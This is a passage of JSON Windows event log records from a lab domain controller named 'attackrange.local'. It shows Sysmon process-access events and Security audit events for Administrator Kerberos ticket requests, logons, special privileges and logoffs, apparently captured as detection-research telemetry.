07:59:08.893","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220529,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x79F88\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x79f88","LogonType":"3","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4810,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:08.908\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:08.908","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220530,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220531,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{BFDF9658-8D50-19B9-4D46-B29268D286D5}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{BFDF9658-8D50-19B9-4D46-B29268D286D5}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220532,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{BFDF9658-8D50-19B9-4D46-B29268D286D5}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{BFDF9658-8D50-19B9-4D46-B29268D286D5}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220533,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x79FC3\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{BFDF9658-8D50-19B9-4D46-B29268D286D5}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x79fc3","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{BFDF9658-8D50-19B9-4D46-B29268D286D5}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220534,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x79FC3\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x79fc3","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4811,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:08.908\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:08.908","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4812,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:08.908\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:08.908","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220535,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6C583\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6c583","LogonType":"3","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220536,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6C2C6\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6c2c6","LogonType":"3","EventReceivedTime":"2020-08-01 07:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
